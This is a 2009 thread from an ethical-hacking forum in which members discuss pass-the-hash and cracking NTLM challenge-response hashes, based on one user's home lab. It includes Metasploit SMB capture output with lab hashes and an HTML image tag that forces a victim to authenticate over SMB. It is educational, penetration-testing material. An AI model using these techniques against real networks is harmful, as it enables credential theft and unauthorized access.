Home
Calendar
Certifications
Columns
Features
Forum
Resources
Vitals
Latest Additions
April 2013 Free Giveaway Sponsor - eLearnSecurity
Human Intelligence to Navigate the Security Data Deluge
February 2013 Free Giveaway Winner of SANS CyberCon Training
Interview: Bugcrowd Founders on Herding Ninjas for Crowdsourced Bug Bounties
Network Forensics: The Tree in the Forest
March 2013 Free Giveaway Sponsor - Mile2
Book Review: Violent Python
February 2013 Free Giveaway Sponsor - SANS
Holiday 2012 Free Giveaway Winner of Metasploit Pro by Rapid7
Course Review: SANS FOR408 Computer Forensic Investigations – Windows In-Depth
The Security Consulting Sugar High
Tutorial: Fun with SMB on the Command Line
Interview: Ilia Kolochenko, CEO of High-Tech Bridge
October 2012 Free Giveaway Winner of LearningGate Training
The Broken: Assessing Corporate Security in 2012 to Make a Better 2013
EH-Net Login
Welcome Guest.
Username:
Password:
Remember me
Lost Password?
No account yet?
Register
Who's Online
We have 40 guests online
You are here:
Home
Ethical Hacking Discussions and Related Certifications
Network Pen Testing
Pass-the-hash question
EH-Net
May 22, 2013, 12:29:56 AM
Welcome,
Guest
. Please
login
or
register
.
Did you miss your
activation email?
1 Hour
1 Day
1 Week
1 Month
Forever
Login with username, password and session length
News
: Go back to The Ethical Hacker Network Online Magazine
Home Page
Home
Help
Calendar
Login
Register
EH-Net
>
Ethical Hacking Discussions and Related Certifications
>
Network Pen Testing
(Moderator:
don
) >
Pass-the-hash question
Pages: [
1
]
Go Down
« previous
next »
Print
Author
Topic: Pass-the-hash question (Read 11879 times)
0 Members and 1 Guest are viewing this topic.
d3l0n
Jr. Member
Offline
Posts: 59
Pass-the-hash question
«
on:
November 12, 2009, 08:46:03 PM »
Is it possible to use a sniffed hash for a connection between Windows XP station and Windows 2003 domain controller in pass-the-hash technique?
Or it is possible only if one used a tool like pass-the-hash tool kit on the Windows XP station, or had it authenticate to a station that is running metasploit smb module?
Thanks
Logged
BillV
Hero Member
Offline
Posts: 1892
Re: Pass-the-hash question
«
Reply #1 on:
November 13, 2009, 05:38:13 AM »
as long as you have a utility that will pass-the-hash, I'm pretty sure you can use the proper hash no matter where you got it from.
Logged
d3l0n
Jr. Member
Offline
Posts: 59
Re: Pass-the-hash question
«
Reply #2 on:
November 13, 2009, 04:24:21 PM »
Thank you BillV.
I tried the sniffed hash with metasploit and and smbshell but it did not work. So I'm guessing it works only with pass-the-hash tool kit I have to try it with this tool though before I conclude.
Here is my environment if that can help.
I have one domain one (Name DC) workstation connect to the domain (Named W1) and one workstation that is in workgroup (s1). I also have an ubuntu version running metasploit 3.3rc1 and nessus 4.
I have cain and able installed on s1 and use it to sniff connections between DC and W1 and also between W1 and s1. The hashes I sniffed I used in metasploit and smbshell as mentioned before, but with not luck.
I tried running smb module in metasploit and had s1 connect to it via URL link with image source set as \\ubuntu\image\trick.gif. But I did not capture anything when I open the html page from s1.
Any idea? Did I do anything wrong?
Thanks in advance for the help.
Logged
d3l0n
Jr. Member
Offline
Posts: 59
Re: Pass-the-hash question
«
Reply #3 on:
November 13, 2009, 04:54:04 PM »
This is capture I have gathered using smb module from s1
Code:
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > [*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:95782ca14bd78a4c70be953811709d71010100000000000098bb33d3b164ca01ae0245df301f235500000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:8ea08aa689958a547540711096d14aee0101000000000000680138d3b164ca0190afd31a5d8b575a00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:aec3bb6e5d2f6f12bd83c0ef46a9e139010100000000000069bc3cd3b164ca015948d33cd527cce100000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:1ded841a3d184703ef5b115de99d8b3001010000000000004a2941d3b164ca0153d0e59769fe94de00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e8b28d52e979c73f8ef6e8d6dd00ec120101000000000000094845d3b164ca016abaf5dd251d583700000000020000000000000000000000 OS: LM:
You can see that for the same session (loading one page once) I gathered multiple NTLM hash values. And these values need "some processing" before getting the real NTLM hash
Logged
timmedin
Sr. Member
Offline
Posts: 469
Re: Pass-the-hash question
«
Reply #4 on:
November 15, 2009, 11:18:38 AM »
I believe you are talking about three different scenarios and each works differnetly.
1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.
2. MSF SMB - This uses a static hash on the client (the metasploit box) so the hash can be retrieved. MSF handles this for you and you can use these hashes in the pash the hash attack.
3. Dump - These hashes can be used for hash the hash
So that explains why your sniffing didn't work.
I don't know why your \\ubuntu\blah\blah didn't work. If you "ping ubuntu" from the other machine does it work? My assumption is that it can't resolve "ubuntu" and fails before it even tries to connect.
Logged
twitter.com/timmedin |
http://blog.securitywhole.com
d3l0n
Jr. Member
Offline
Posts: 59
Re: Pass-the-hash question
«
Reply #5 on:
November 16, 2009, 12:38:41 PM »
Thanks so much timmedin for the detail explanation.
In my previous post, I posted a capture I gathered from msf smb module. What I did to the html page to make it work is that I change the img url to this <img src="file://ubuntu/blah/blah.img" >
But as you can see from the capture LM is not used at all. NTLM hash is much longer than the usual. I'm not sure if there is further tweaks needs to be done to the hash to make it usable, or if it can't be used at all.
Any idea?
thx
Logged
d3l0n
Jr. Member
Offline
Posts: 59
Re: Pass-the-hash question
«
Reply #6 on:
November 24, 2009, 01:40:14 AM »
Quote
1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.
How hard/easy it is for an attacker to guess/crack the challenge? What if both the workstation and the server only supports NTLM or only NTLMv2?
Thanks
Logged
timmedin
Sr. Member
Offline
Posts: 469
Re: Pass-the-hash question
«
Reply #7 on:
November 28, 2009, 11:27:09 PM »
Did you try using Cain & Abel or Opht to crack it? Since you have the password hash that is "encrypted" with the challenge you can't use it in a pash the hash attack. You need just the password hash to use it in the pash the hash attack.
Logged
twitter.com/timmedin |
http://blog.securitywhole.com
timmedin
Sr. Member
Offline
Posts: 469
Re: Pass-the-hash question
«
Reply #8 on:
November 28, 2009, 11:29:13 PM »
Here is the blog post from metasploit.com on the subject.
http://blog.metasploit.com/2008/11/ms08-067-metasploit-and-smb-relay.html
Logged
twitter.com/timmedin |
http://blog.securitywhole.com
d3l0n
Jr. Member
Offline
Posts: 59
Re: Pass-the-hash question
«
Reply #9 on:
November 30, 2009, 12:03:45 AM »
Thanks much timmedin. Incidentally I was reading the post you kindly provided a link to.
This is my understanding on the subject. Cracking a sniffed challenge-response hash to get the password hash is not an easy task (time wise) when the challenge key is not known. If the challenge key is known, the process will be much easier. This is however if LM/NTLM challenge-response is sniffed, however if NTLMv2 is sniffed, it will be extremely hard to do.
Thanks a lot timmedin for all your help in this post.
«
Last Edit: November 30, 2009, 12:05:42 AM by d3l0n
»
Logged
apollo
Full Member
Offline
Posts: 146
Re: Pass-the-hash question
«
Reply #10 on:
November 30, 2009, 12:18:09 AM »
If you get bored, I have some stuff on capturing challenge hashes and having fun with them in my presentation at
http://www.sector.ca/presentations.htm
. Basically, if you have a static challenge for NTLMv1 auth, then you haven't really increased complexity of cracking the password by very much. The reason for this is for NTLMv1 only the server sets a challenge. In NTLMv2 then both the client and the server have set a challenge and so it almost makes it impossible to use any sort of time-tradeoff method such as rainbow tables to crack the password. You are left with brute force. The two challenges don't increase the complexity significantly over having a single random challenge, but it does mean that having control over one of the challenges will not help you much. Turning off LM also increases the complexity of cracking NTLMv1 challenge/response as you are left having to crack a whole hash instead of with the LM portion of NTLMv1 you can perform an attack known as a half-lm challenge attack which will get you the first 8 characters of the password a lot faster, and then allow you to only brute force the last X characters of the password. If the password is < 11 characters, the time isn't significant. Passwords over 11 characters still require a fair amount of time, and it goes up exponentially as you add characters.
Anyway, hope this helps some.
-Ryan
Logged
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
d3l0n
Jr. Member
Offline
Posts: 59
Re: Pass-the-hash question
«
Reply #11 on:
December 02, 2009, 12:34:59 PM »
Very informative Ryan, thank you so much!
Logged
Pages: [
1
]
Go Up
Print
« previous
next »
Jump to:
Please select a destination:
-----------------------------
EH-Net
-----------------------------
=> Calendar Of Events
===> ChicagoCon 2007
===> ChicagoCon 2008s
===> ChicagoCon 2008f
===> ChicagoCon 2009s
=> Ethical Hacktivism
=> News Items and General Discussion About EH-Net
===> Greetings
=> Special Events
-----------------------------
Ethical Hacking Discussions and Related Certifications
-----------------------------
=> General Certification
===> Networking
===> OS
===> Security
=> Compliance, Regulations & Standards
=> Control Systems
=> Cyber Warfare
=> Forensics
===> CCE / MCCE - (Master) Certified Computer Examiner
===> CHFI - Computer Hacking Forensic Investigator
===> EnCE - EnCase® Certified Examiner
===> GCFA - GIAC Certified Forensics Analyst
=> Hardware
=> Incident Response
===> CSIH - Computer Security Incident Handler
===> GCIH - GIAC Certified Incident Handler
=> Malware
===> Advisories
=> Mobile
=> Network Pen Testing
===> CEH - Certified Ethical Hacker
===> CPTC - Certified Penetration Testing Consultant
===> CPTE - Certified Penetration Testing Engineer
===> CSTA - Certified Security Testing Associate
===> eCPPT - eLearnSecurity Certified Professional Penetration Tester
===> ECSA - EC-Council Certified Security Analyst
===> GPEN - GIAC Certified Penetration Tester
===> OSCP - Offensive Security Certified Professional
=> Physical Security
=> Programming
=> Social Engineering
=> Web Applications
=> Wireless
===> CWNP Certs
===> GAWN - GIAC Assessing Wireless Networks
===> OSWP - Offensive Security Wireless Professional
=> Other
-----------------------------
Columns
-----------------------------
=> Editor-In-Chief
=> Andress
=> Gates
=> Haddix
=> Hadnagy
=> Heffner
=> Hoffman
=> Linn
=> RichM
=> Murray
=> J. Peltier
=> Weidman
=> Wilson
-----------------------------
Features
-----------------------------
=> /root
=> Book Reviews
=> Opinions
=> Skillz
===> Examples
===> May 06 - Star Hacks, Episode V: The Empire Hacks Back
===> July 06 - Hack Bill!
===> Sept 06 - Netcat in the Hat
===> Nov 06 - Hitch-Hackers Guide to the Galaxy
===> Dec 06 - A Christmas (Hacking) Story
===> Feb 07 - Charlottes Web Site
===> April 07 - Microsoft Office Space
===> June 07 - Serenity Hack
===> Oct 07 - Worst. Ethical. Hacker. Challenge. Ever.
===> Dec 07 - Frosty the Snow Crash
===> March 2008 - It Happened One Friday
===> Oct 2008 - Scooby Doo and the Crypto Caper
===> Dec 08 - Santa Claus Is Hacking to Town
===> Feb 2009 - Brady Bunch Boondoggle
===> July 2009 - Prison Break
===> October 2009 - SSHliders
===> December 2009 - Miracle on Thirty-Hack Street
===> December 2010 - The Nightmare Before Charlie Browns Christmas
-----------------------------
Resources
-----------------------------
=> Career Central
===> Looking For Work
===> Looking To Hire
=> Links to cool sites.
=> Mass Media
=> News from the Outside World
=> Tools
=> Tutorials
===> Tutorial Requests
Loading...
Exclusive Deal
SANSFIRE 2013
June 15 - 22
5% Off
w/ Code
:
EHN_5
SANS Deals 4 EH-Netters
5% OFF
Any
SANS Course
in Any Format!
Coupon Code:
EHN_5
Including
SANS Rocky Mountain 2013
&
SANS Boston 2013
Polls
Compared to this year, 2013 will be:
Great!
Better.
About the same.
Little worse.
FUBAR!
Recent Forum Topics
Programming
: Finished Python Course in Codecademy now what?
(14) by
3xban
Network Pen Testing
: Ruby on Rails Vulnerabilities/Attacks in BackTrack 5 r3
(0) by
SUdoctstudent
Network Pen Testing
: De-ICE 1.140 released!
(2) by
superkojiman
Network Pen Testing
: AIX Vulnerability Assessments
(1) by
3xban
General Certification
: CPT Practical Submission
(1) by
UNIX
OSCP - Offensive Security Certified Professional
: Failed my first attempt at the OSCP exam
(94) by
azmatt
Tools
: Social-Engineer Toolkit (SET) Version 5.0 “The Wild West” Released
(2) by
m0wgli
Malware
: EICAR?
(3) by
UKSecurityGuy
Advisories
: HTB23154: Multiple Vulnerabilities in Exponent CMS
(0) by
AndyP
Advisories
: HTB23153: Multiple Vulnerabilities in Jojo CMS
(0) by
AndyP
Advisories
: HTB23151: Cross-Site Request Forgery (CSRF) in UMI.CMS
(0) by
AndyP
Tutorials
: Need guidance
(8) by
r0ckm4n
OSCP - Offensive Security Certified Professional
: Class Scheduled 6/8 - Linux n00b
(7) by
Taemyks
OSCP - Offensive Security Certified Professional
: OSCP exam scheduled
(6) by
gbhat
Incident Response
: LinkedIn Forensics
(0) by
AFENTIS_Forensics
General Certification
: Red Team/Blue Team
(1) by
ajohnson
Career Central
: Starter cert?
(3) by
Grendel
Network Pen Testing
: Beginner Ethical Hacker
(1) by
m0wgli
Web Applications
: Nessus and Nikto
(4) by
Seen
Network Pen Testing
: Cracking salted MD5 hash
(4) by
n37sh@rk
CEH - Certified Ethical Hacker
: Passed my C|EH
(3) by
n37sh@rk
Mass Media
: EC-council hacked, irony at his best?
(0) by
j0rDy
Web Applications
: SQL Injection into an INSERT statement.
(6) by
eyenit0
Network Pen Testing
: Solution for sipXtapi INVITE Message CSeq Field Header Remote Overflow
(1) by
m0wgli
Web Applications
: dns
(2) by
H1t M0nk3y
Other
: BSides Boston
(0) by
3xban
Career Central
: InfoSec in Central, FL
(2) by
tturner
Web Applications
: Web vulnerability scanner
(4) by
H1t M0nk3y
EH-Net News Feeds
Latest Additions
Privacy Notice
for TDCC & All Properties
© 2013 The Ethical Hacker Network
Joomla!
is Free Software released under the GNU/GPL License.
Programming : Finished Python Course in Codecademy now what?
